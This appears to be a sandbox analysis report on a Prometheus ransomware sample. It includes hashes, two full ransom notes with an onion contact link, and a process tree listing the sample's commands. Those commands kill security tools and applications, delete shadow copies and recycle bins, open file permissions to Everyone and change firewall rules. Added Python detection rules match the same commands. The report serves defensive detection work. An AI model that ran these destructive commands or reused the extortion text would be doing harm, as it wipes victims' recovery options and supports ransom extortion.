Resubmissions

13-08-2024 05:39

240813-gcg68swhqg 10

28-05-2021 06:53

210528-9sn3jdwaa2 10

Analysis

  • max time kernel
    129s
  • max time network
    124s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    13-08-2024 05:39

General

  • Target

    e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.exe

  • Size

    290KB

  • MD5

    a6dcf23059f6e61fa683907c47baf73e

  • SHA1

    1d55396b26d97b18256513607dcbe3f308569d5b

  • SHA256

    e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3

  • SHA512

    72ef9997b814807e677e7861a94de3c8c2b7cb350ab79c887de61f505f23ebc2e3db177b34e86f1dedb3017f468e5c6c0f34d188c574e4cbe20410ff1bf596f7

  • SSDEEP

    6144:a7QOomfMNffeRQHO1l+E9eWGktbD3xEKHb6Em:aVomfwfahxND3xEKHbH

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt

Family

prometheus

Ransom Note
YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. -------------------------------------------------------------------------------- We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. -------------------------------------------------------------------------------- As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after it's run. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. -------------------------------------------------------------------------------- !!!!!!!!!!!!!!!!!!!!!!!! If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. !!!!!!!!!!!!!!!!!!!!!!!!! -------------------------------------------------------------------------------- It doesn't matter to us what you choose. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: 1. Type the addres "https://www.torproject.org" in your Internet browser. It opens the Tor site. 2. Press "Download Tor", then press "Download Tor Browser Bundle", install it. 3. Open the Tor browser. Copy the link http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD and paste it in the Tor browser. 7. Start a chat and follow the further instructions. Attention! 
Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: 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
URLs

http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

Family

prometheus

Ransom Note
YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after it’s installation. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. It doesn't matter to us what you choose. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: 1. Type the addres "https://www.torproject.org" in your Internet browser. It opens the Tor site. 2. Press "Download Tor", then press "Download Tor Browser Bundle", install it. 3. Open the Tor browser. Copy the link http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD and paste it in the Tor browser. 7. Start a chat and follow the further instructions. Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: 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
URLs

http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD

Signatures

  • Disables service(s) 3 TTPs
  • Prometheus Ransomware

    Ransomware family that has mostly targeted the manufacturing industry and claims to be affiliated with REvil.

  • Renames multiple (174) files with added filename extension

    A burst of renames that append the same new extension suggests ransomware encrypting the files on the system.

  • Modifies Windows Firewall 2 TTPs 4 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Drops startup file 1 IoCs
  • Modifies file permissions 1 TTPs 3 IoCs
  • Modifies WinLogon 2 TTPs 2 IoCs
  • Network Service Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the host's network.

  • Launches sc.exe 8 IoCs

    sc.exe is a Windows utility for controlling services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. The netsh invocations recorded in this run set firewall rule groups ("Network Discovery", "File and Printer Sharing") rather than register a helper DLL; the signature fires on the netsh launch itself.

  • Kills process with taskkill 48 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
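The "Renames multiple (174) files with added filename extension" signature above is a rate heuristic over file-rename events rather than a match on any single command. The block below is an added example, not code from the sandbox or from the sample: it applies that heuristic to a constructed stream of rename records (timestamp in seconds, pid, old path, new path), flagging a process that appends the same new extension to many files inside a short window. The ".locked" extension, the 20-file threshold and the 60 s window are assumptions for the demonstration, not values taken from this report.

```python
"""Rename-burst heuristic: one process appending the same extension to many files.

Added example, not the sandbox's own logic. Input records are constructed
(timestamp in seconds, pid, old path, new path), loosely modelled on an
EDR/Sysmon file-rename event. Threshold, window and the ".locked"
extension are assumptions for the demonstration.
"""
from collections import defaultdict, deque


def appended_extension(old_path, new_path):
    """Return 'ext' when new_path == old_path + '.ext' (exactly one new
    component, no directory separator), else None."""
    if not new_path.startswith(old_path):
        return None
    tail = new_path[len(old_path):]
    if len(tail) < 2 or tail[0] != "." or "." in tail[1:]:
        return None
    if "\\" in tail or "/" in tail:
        return None
    return tail[1:]


def detect_rename_burst(events, threshold=20, window_s=60.0):
    """Sliding window per (pid, appended extension); one alert per key when
    the number of renames inside the window reaches the threshold."""
    recent = defaultdict(deque)
    alerted = set()
    alerts = []
    for ts, pid, old_path, new_path in sorted(events):
        ext = appended_extension(old_path, new_path)
        if ext is None:
            continue  # ordinary rename, not an appended extension
        key = (pid, ext)
        window = recent[key]
        window.append(ts)
        while window and ts - window[0] > window_s:
            window.popleft()
        if len(window) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"pid": pid, "ext": ext, "count": len(window),
                           "first_seen": window[0], "last_seen": ts})
    return alerts


# Constructed sample: pid 3512 appends ".locked" to 25 documents in ~12 s,
# pid 4100 makes three ".bak" copies (below threshold), pid 4200 renames
# one file in place (not an appended extension).
SAMPLE_RENAMES = (
    [(100.0 + 0.5 * i, 3512,
      rf"C:\Users\Admin\Documents\file{i}.docx",
      rf"C:\Users\Admin\Documents\file{i}.docx.locked") for i in range(25)]
    + [(105.0 + i, 4100,
        rf"C:\Users\Admin\Backups\db{i}.sql",
        rf"C:\Users\Admin\Backups\db{i}.sql.bak") for i in range(3)]
    + [(110.0, 4200, r"C:\Users\Admin\report.docx", r"C:\Users\Admin\report_v2.docx")]
)

if __name__ == "__main__":
    for alert in detect_rename_burst(SAMPLE_RENAMES):
        print(alert)
```

Keying the window on the appended extension, not just the pid, keeps backup tools that add ".bak" to a handful of files from tripping the same counter as a process that stamps one new suffix on everything it touches; the alert carries the first and last timestamps so a responder can bound the encryption window.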

Processes

  • C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.exe
    "C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.exe"
    1⤵
    • Checks computer location settings
    • Drops startup file
    • Modifies WinLogon
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:3512
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill" /F /IM RaccineSettings.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2280
    • C:\Windows\SYSTEM32\reg.exe
      "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
      2⤵
        PID:2464
      • C:\Windows\SYSTEM32\reg.exe
        "reg" delete HKCU\Software\Raccine /F
        2⤵
        • Modifies registry key
        PID:3044
      • C:\Windows\SYSTEM32\schtasks.exe
        "schtasks" /DELETE /TN "Raccine Rules Updater" /F
        2⤵
          PID:1264
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
          2⤵
            PID:2204
          • C:\Windows\SYSTEM32\sc.exe
            "sc.exe" config Dnscache start= auto
            2⤵
            • Launches sc.exe
            PID:2112
          • C:\Windows\SYSTEM32\sc.exe
            "sc.exe" config SSDPSRV start= auto
            2⤵
            • Launches sc.exe
            PID:4948
          • C:\Windows\SYSTEM32\sc.exe
            "sc.exe" config FDResPub start= auto
            2⤵
            • Launches sc.exe
            PID:2200
          • C:\Windows\SYSTEM32\sc.exe
            "sc.exe" config upnphost start= auto
            2⤵
            • Launches sc.exe
            PID:3448
          • C:\Windows\SYSTEM32\sc.exe
            "sc.exe" config SQLTELEMETRY start= disabled
            2⤵
            • Launches sc.exe
            PID:1736
          • C:\Windows\SYSTEM32\sc.exe
            "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
            2⤵
            • Launches sc.exe
            PID:1844
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c rd /s /q D:\\$Recycle.bin
            2⤵
              PID:3848
            • C:\Windows\SYSTEM32\sc.exe
              "sc.exe" config SQLWriter start= disabled
              2⤵
              • Launches sc.exe
              PID:1728
            • C:\Windows\SYSTEM32\sc.exe
              "sc.exe" config SstpSvc start= disabled
              2⤵
              • Launches sc.exe
              PID:2252
            • C:\Windows\SYSTEM32\netsh.exe
              "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
              2⤵
              • Modifies Windows Firewall
              • Event Triggered Execution: Netsh Helper DLL
              PID:2760
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM mspub.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3920
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM firefoxconfig.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3836
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM excel.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1060
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM agntsvc.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3980
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM mydesktopqos.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2876
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM CNTAoSMgr.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4644
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM thebat.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2436
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM mydesktopservice.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4352
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM sqlwriter.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3352
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM mysqld.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4388
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM steam.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4956
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM tbirdconfig.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4972
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM sqbcoreservice.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3372
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM encsvc.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2968
            • C:\Windows\SYSTEM32\netsh.exe
              "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
              2⤵
              • Modifies Windows Firewall
              • Event Triggered Execution: Netsh Helper DLL
              PID:1936
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM dbeng50.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4420
            • C:\Windows\SYSTEM32\netsh.exe
              "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
              2⤵
              • Modifies Windows Firewall
              • Event Triggered Execution: Netsh Helper DLL
              PID:4612
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM thebat64.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3856
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" IM thunderbird.exe /F
              2⤵
              • Kills process with taskkill
              PID:2184
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM isqlplussvc.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4844
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM dbsnmp.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1072
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM ocomm.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3312
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM onenote.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:380
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM xfssvccon.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1512
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM infopath.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1628
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM PccNTMon.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2864
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM mspub.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2980
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM mbamtray.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2744
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM msaccess.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:528
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM Ntrtscan.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4940
            • C:\Windows\SYSTEM32\netsh.exe
              "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
              2⤵
              • Modifies Windows Firewall
              • Event Triggered Execution: Netsh Helper DLL
              PID:1776
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM zoolz.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3644
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM outlook.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2280
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM tmlisten.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3060
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM mydesktopservice.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:652
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM ocautoupds.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2844
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM sqlservr.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3852
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM msftesql.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1744
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM winword.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1964
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM powerpnt.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1700
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM synctime.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4992
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM ocssd.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4000
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM mysqld-nt.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:964
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM mydesktopqos.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2100
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM oracle.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1368
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM wordpad.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4740
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM visio.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3764
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM sqlagent.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4164
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM mysqld-opt.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4056
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM sqlbrowser.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3492
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
              2⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:496
              • C:\Windows\System32\Conhost.exe
                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                3⤵
                  PID:4972
              • C:\Windows\SYSTEM32\icacls.exe
                "icacls" "C:*" /grant Everyone:F /T /C /Q
                2⤵
                • Modifies file permissions
                PID:3540
              • C:\Windows\SYSTEM32\icacls.exe
                "icacls" "Z:*" /grant Everyone:F /T /C /Q
                2⤵
                • Modifies file permissions
                PID:2084
              • C:\Windows\SYSTEM32\icacls.exe
                "icacls" "D:*" /grant Everyone:F /T /C /Q
                2⤵
                • Modifies file permissions
                PID:4532
              • C:\Windows\SYSTEM32\arp.exe
                "arp" -a
                2⤵
                • Network Service Discovery
                PID:1056
              • C:\Windows\System32\mshta.exe
                "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
                2⤵
                  PID:3372
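The process tree above is the whole pre-encryption chain in one place: remove Raccine (process kill, Run key, schtasks), wipe shadow copies and recycle bins, grant Everyone full control on every drive, open the firewall for discovery and file sharing, stop services and kill the applications that hold database and Office files open, enumerate the ARP cache, then display the note through mshta. The block below is an added detection example, not code from the sandbox or from the sample: it runs a small rule set over process-creation events in a Sysmon-style parent/child record. The sample events are constructed from the command lines on this page, the one benign event is invented noise, and the ATT&CK technique IDs and thresholds are this example's own mapping, not the report's.

```python
"""Score a Windows process tree for the ransomware pre-encryption chain.

Added example, not code from the sandbox or the sample. Events are
constructed from the command lines in the process tree on this page, in a
Sysmon Event ID 1 style record (parent pid, pid, image, command line).
The ATT&CK technique IDs and thresholds are this example's own mapping.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    ppid: int
    pid: int
    image: str
    cmdline: str


# (finding name, ATT&CK technique, regex applied to lower-cased "image cmdline")
RULES = [
    ("raccine_tamper", "T1562.001",
     r"taskkill.*raccinesettings\.exe|reg.*delete.*raccine|schtasks.*raccine"),
    ("shadow_copy_delete", "T1490",
     r"win32_shadowcopy|vssadmin.*delete\s+shadows|wmic.*shadowcopy\s+delete"),
    ("recycle_bin_wipe", "T1490", r"rd\s+/s\s+/q\s+\S*\$recycle\.bin"),
    ("acl_everyone_full", "T1222.001", r"icacls.*/grant\s+everyone:f"),
    ("firewall_open_sharing", "T1562.004",
     r'netsh\S*\s+advfirewall.*(network discovery|file and printer sharing).*enable=yes'),
    ("service_disable", "T1489", r'sc(\.exe)?"?\s+config\s+\S+\s+start=\s*disabled'),
    ("arp_discovery", "T1016", r'\barp(\.exe)?"?\s+-a\b'),
    ("mshta_ransom_note", "T1218.005", r"mshta.*restore_files_info"),
]
KILL_THRESHOLD = 5  # taskkill.exe launches under one parent (assumption)


def analyze(events, kill_threshold=KILL_THRESHOLD):
    """Return {parent_pid: {finding: technique}} for every parent with a hit."""
    findings = defaultdict(dict)
    taskkill_launches = defaultdict(int)
    for ev in events:
        text = f"{ev.image} {ev.cmdline}".lower()
        for name, technique, pattern in RULES:
            if re.search(pattern, text):
                findings[ev.ppid][name] = technique
        # Count every taskkill.exe spawn instead of parsing /IM targets: the
        # tree above has one malformed call ("IM thunderbird.exe", no slash)
        # that a target-parsing rule would silently miss.
        if ev.image.lower().endswith("\\taskkill.exe"):
            taskkill_launches[ev.ppid] += 1
    for ppid, n in taskkill_launches.items():
        if n >= kill_threshold:
            findings[ppid]["mass_process_kill"] = "T1489"
    return dict(findings)


def verdict(findings, min_findings=4):
    """Collapse per-parent findings into a label; the cut-off is an assumption."""
    return {ppid: ("ransomware_precursor_chain" if len(f) >= min_findings else "suspicious")
            for ppid, f in findings.items()}


P = 3512  # parent pid of the sample in the tree above
SAMPLE_EVENTS = [
    ProcEvent(P, 2280, r"C:\Windows\SYSTEM32\taskkill.exe", r'"taskkill" /F /IM RaccineSettings.exe'),
    ProcEvent(P, 2464, r"C:\Windows\SYSTEM32\reg.exe",
              r'"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F'),
    ProcEvent(P, 1264, r"C:\Windows\SYSTEM32\schtasks.exe", r'"schtasks" /DELETE /TN "Raccine Rules Updater" /F'),
    ProcEvent(P, 2204, r"C:\Windows\SYSTEM32\cmd.exe", r'"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin'),
    ProcEvent(P, 1736, r"C:\Windows\SYSTEM32\sc.exe", r'"sc.exe" config SQLTELEMETRY start= disabled'),
    ProcEvent(P, 2760, r"C:\Windows\SYSTEM32\netsh.exe",
              r'"netsh" advfirewall firewall set rule group="Network Discovery" new enable=Yes'),
    ProcEvent(P, 3920, r"C:\Windows\SYSTEM32\taskkill.exe", r'"taskkill.exe" /IM mspub.exe /F'),
    ProcEvent(P, 1060, r"C:\Windows\SYSTEM32\taskkill.exe", r'"taskkill.exe" /IM excel.exe /F'),
    ProcEvent(P, 3852, r"C:\Windows\SYSTEM32\taskkill.exe", r'"taskkill.exe" /IM sqlservr.exe /F'),
    ProcEvent(P, 2280, r"C:\Windows\SYSTEM32\taskkill.exe", r'"taskkill.exe" /IM outlook.exe /F'),
    ProcEvent(P, 2184, r"C:\Windows\SYSTEM32\taskkill.exe", r'"taskkill.exe" IM thunderbird.exe /F'),
    ProcEvent(P, 496, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }'),
    ProcEvent(P, 3540, r"C:\Windows\SYSTEM32\icacls.exe", r'"icacls" "C:*" /grant Everyone:F /T /C /Q'),
    ProcEvent(P, 1056, r"C:\Windows\SYSTEM32\arp.exe", r'"arp" -a'),
    ProcEvent(P, 3372, r"C:\Windows\System32\mshta.exe",
              r'"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta'),
    # Constructed benign noise under another parent; must not produce a finding.
    ProcEvent(1000, 1001, r"C:\Windows\System32\cmd.exe", r'"cmd.exe" /c dir C:\Users'),
]

if __name__ == "__main__":
    for ppid, f in analyze(SAMPLE_EVENTS).items():
        print(ppid, verdict({ppid: f})[ppid], sorted(f.items()))
```

Matching on the shadow-copy class name rather than on a well-formed PowerShell statement is deliberate: the captured command uses `$_Delete()` instead of `$_.Delete()`, so the deletion may never have run, but the intent is unambiguous and that is what the rule should key on. Any single rule here is noisy on its own (administrators do run `icacls` and `netsh advfirewall`); the value is in requiring several of them under one parent inside one run.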

              Network

              MITRE ATT&CK Enterprise v15

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wkl521li.iiz.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

                Filesize

                21KB

                MD5

                f363f899e5ed486f5885501148292bff

                SHA1

                a709ef31c515de039fb25ac582072bcf673ecdf7

                SHA256

                2b72c6c6966a73338c551bc597eb45bb48940687575f3bde9e091fbbe538cfa4

                SHA512

                242733b3fbe41221351474b595ac54e40b96a65f308a3c84873c8a2af332450f5b529ff058646a14857c94286932baf400e6fcd8fe3a15f5978e5e516757057a

              • C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt

                Filesize

                2KB

                MD5

                fce3819bef51d6be4feebefbe4a522ae

                SHA1

                614063f71f644bb25ad5dc96c4f43010d0300b19

                SHA256

                e8c2e5af1b537d0348fce973b89f6a30e35e15a79050bd07d4109800775f30b0

                SHA512

                3b3f32a350105f48a526f60b6178b4f306cfaedcb94e691473edfefa0095bf33da2bcbf879f16b7b6b2e83d0ee0ff9eee4a2962e01d8489e268c4bd313b33a6e

              • memory/496-7-0x0000018FE4D40000-0x0000018FE4D62000-memory.dmp

                Filesize

                136KB

              • memory/3512-1-0x00007FFCBB183000-0x00007FFCBB185000-memory.dmp

                Filesize

                8KB

              • memory/3512-0-0x0000000000B00000-0x0000000000B4E000-memory.dmp

                Filesize

                312KB

              • memory/3512-2-0x00007FFCBB180000-0x00007FFCBBC41000-memory.dmp

                Filesize

                10.8MB

              • memory/3512-457-0x00007FFCBB183000-0x00007FFCBB185000-memory.dmp

                Filesize

                8KB

              • memory/3512-458-0x00007FFCBB180000-0x00007FFCBBC41000-memory.dmp

                Filesize

                10.8MB